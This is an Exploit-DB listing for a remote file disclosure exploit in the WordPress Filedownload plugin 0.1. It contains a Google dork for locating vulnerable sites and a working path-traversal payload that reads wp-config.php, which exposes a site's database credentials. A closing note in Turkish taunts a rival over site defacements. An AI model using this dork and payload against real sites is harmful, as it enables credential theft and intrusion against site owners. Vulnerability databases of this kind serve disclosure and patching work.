EXPLOITS

WordPress Plugin Filedownload 0.1 - 'download.php' Remote File Disclosure

Author: Septemb0x
type: webapps
platform: php
port: 
date_added: 2011-09-19  
date_updated: 2011-09-19  
verified: 1  
codes: OSVDB-75605  
tags: WordPress Plugin  
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comfiledownload.zip  

raw file: 17858.txt  

# Exploit Title: WordPress Filedownload Plugin 0.1 (download.php) Remote File Disclosure Vulnerability
# Google Dork: inurl:"/wp-content/plugins/filedownload/download.php/?path"
# Date: 18-09-2011
# Author: Septemb0x ( CYBER-WARRIOR )
# Software Link: http://plugins.svn.wordpress.org/filedownload/trunk/filedownload.php
# Version: 0.1


POC : /wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php


# NOTE: Kendini Birþey Zanneden Velet  Senin Hiç Böyle Bug'n Oldumu ki Sitelerime Ýndex Basasýn? Öptüm Büyüde Gel.